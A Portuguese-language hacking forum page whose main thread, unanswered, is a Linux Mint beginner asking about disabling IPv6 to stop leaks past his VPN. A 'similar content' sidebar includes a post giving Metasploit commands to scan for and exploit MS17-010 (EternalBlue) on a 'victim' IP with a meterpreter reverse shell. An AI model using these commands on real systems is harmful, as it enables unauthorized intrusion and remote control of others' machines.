Entre para seguir isso  
Visitante

Quais os ricos de se desativar o IPv6?

1 post neste tópico

Visitante

Gosto de anonimanto e privacidade, sou mais um destes neuróticos por aí que quer ficar longe dos olhos das grandes corporações, empresas de poblicidade, trackers, etc., então gosto sempre de usar bloqueadores e vários outros serviços, como VPN, só que essa semana descobri algo que me deixou frustrado, "IPv6 e VPN". Sou um iniciante no Linux ainda, descubro coisas todos os dias e a descoberta da vez foi que os serviços de VPN comumente cobrem apenas o IPv4 deixando vazar então o endereço de IPv6, e meio que literalmente inutilizando o anonimanto que a VPN proporcionaria. Isso me deixou puto pra caralho, porque justamente o que quero é anonimanto, então o que pensei em fazer? Depois de tentar configurar por várias vezes o IPv6 para ficar anônimo de alguma forma, optei por desativá-lo. Daí vieram minhas dúvidas.

Quais as possíveis consequências de desativar o IPv6?

O IPv4 juntamente com a proteção que fornece a VPN daria uma segurança a nível (ou melhor) que a do IPv6? Porque sei que o IPv4 tem problemas de segurança, então a VPN poderia sana-los? 

Essa foi a única forma que encontrei de conseguir ficar anônimo quando se trata de endereços de IP, se alguém puder me indicar outras formas, como anonimizar o próprio IPv6, algo que não consegui.

Meu sistema operacional é o Linux Mint e uso a própria VPN que vem nele, configuro lá e acesso. Daí o serviço de VPN que uso pra acessar é do RiseupVPN.

Compartilhar este post

Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Entre para seguir isso  

• Conteúdo Similar

• Por CyborgMx
      eai galera beleza? vim aqui compartilhar esse esquema com vocÊs, pois não sei vocÊs mais eu prefiro usar o kali instalado no HD,  por isso tenho um HD  para o kali e um para o windows
      espero que esse conteúdo de alguma forma ajude algum de vocÊs VLW.

• Por B3T4
      Quando se consegue o IP de alguém via internet(Ex: Meu IP), esse IP é aquele que serve para uma invasão??
      Ex: quando entramos em alguns sites eles mostram um alerta parecido com esse:
      "Detectámos que estás a usar o IP 186.89.175.6 e que estás em (ou perto) no país Brazil. Se nós conseguimos saber isto, os outros sites por onde andas também conseguem"
      Mas todos sabemos que quando pegamos o IP de alguém, esse tal IP e semelhante a este do alerta, mas o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima é diferente desses conseguimos pegar pela internet.
      O "X" da minha questão é o seguinte: esse IP que conseguimos pegar pela internet, é o IP que serve para uma invasão?
      Ou a invasão só acontece se tivermos o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima?

Resumo do PC alvo(Um notebook meu que esta conectado em uma rede Wi-Fi que não é minha)
      OBS: Meu PC para invadir o alvo esta conectado em uma rede minha, Mas meu notebook esta conectado em uma rede que não me pertence.
      Notebook no site, Meu IP, mostra um certo número de IP(O provedor o site conseguiu identificar corretamente)
      Notebook em, configurações do TCP/IP, Mostra o IP configurado manualmente por mim
      Notebook no software, Ralink Wireless Lan Card, mostra o IP configurado manualmente por mim no TCP/IP
    • Por Apoc
      Salve negada! 
      Quero compartilhar uma ferramenta muito útil que andei testando.
      VPN gratuita hoje em dia ta complicado de achar, pois bem, apresento uma VPN gratuita de qualidade.

Ela foi feita pelos mesmos criadores do Protonmail. Se você não conhece, está perdendo a oportunidade de ter uma conta de e-mail das mais seguras da atualidade.
      Eles prezam pela privacidade e liberdade na internet, sendo assim, eu não acredito que iriam fazer um trabalho mal feito na VPN.

Ela tem alguns planos pagos mas também há o plano gratuito. Apesar de na descrição ele informar algumas limitações, quero enfatizar que na lista de download dos servidores, quando você se cadastra no plano grátis, eu consegui baixar e conectar normalmente em um servidor da Suiça utilizando como Plus alguns servidores Tor. O que de acordo com a descrição do plano, eu teria que pagar para poder usar.

OBS: Você vai ter a opção de utilizar o Cliente do ProtonVPN, baixar, instalar e usar. Ou vai poder usar um arquivo de configuração para OpenVPN.
      Eu utilizei a segunda opção, apenas por que eu já tenho o OpenVPN instalado, não queria baixar mais um programa, mas vale a pena testar o cliente deles, deve ser fácil de usar.

Link para escolha do plano e registro: https://protonvpn.com/pricing

Evidência de que consegui usar um servidor Tor no plano grátis (é eu poderia ter printado a página toda mas foda-se, vai ter q confiar na minha palavra, fiquei com preguiça de conectar novamente só pra printar):

ProtonVPN

• Por explorerjust
      Ataque via ip que funciona apenas com windows 7.

msfconsole
      ===scan pra saber se a vitima é vulneravel===
      use auxiliary/scanner/smb/smb_ms17_010
      set RHOSTS (com s no final msm) ip da vitima
      exploit
      se a vitima for vulneravel aparecera um aviso na tela falando que a vitima pode ser atacada
      ===usando exploit===
      use exploit/windows/smb/ms17_010_eternalblue
      set payload windows/(x64 para sistemas de 64 bits se nao for deixa sem nada e continua)/meterpreter/reverse_tcp
      set processname (nome que quiser para o processo)
      set LHOST (seu ip)
      set RHOST (ip da vitima)
      exploit

• Visitante
      Por Visitante
      Gosto de anonimanto e privacidade, sou mais um destes neuróticos por aí que quer ficar longe dos olhos das grandes corporações, empresas de poblicidade, trackers, etc., então gosto sempre de usar bloqueadores e vários outros serviços, como VPN, só que essa semana descobri algo que me deixou frustrado, "IPv6 e VPN". Sou um iniciante no Linux ainda, descubro coisas todos os dias e a descoberta da vez foi que os serviços de VPN comumente cobrem apenas o IPv4 deixando vazar então o endereço de IPv6, e meio que literalmente inutilizando o anonimanto que a VPN proporcionaria. Isso me deixou puto pra caralho, porque justamente o que quero é anonimanto, então o que pensei em fazer? Depois de tentar configurar por várias vezes o IPv6 para ficar anônimo de alguma forma, optei por desativá-lo. Daí vieram minhas dúvidas.
      Quais as possíveis consequências de desativar o IPv6?
      O IPv4 juntamente com a proteção que fornece a VPN daria uma segurança a nível (ou melhor) que a do IPv6? Porque sei que o IPv4 tem problemas de segurança, então a VPN poderia sana-los? 
      Essa foi a única forma que encontrei de conseguir ficar anônimo quando se trata de endereços de IP, se alguém puder me indicar outras formas, como anonimizar o próprio IPv6, algo que não consegui.
      Meu sistema operacional é o Linux Mint e uso a própria VPN que vem nele, configuro lá e acesso. Daí o serviço de VPN que uso pra acessar é do RiseupVPN.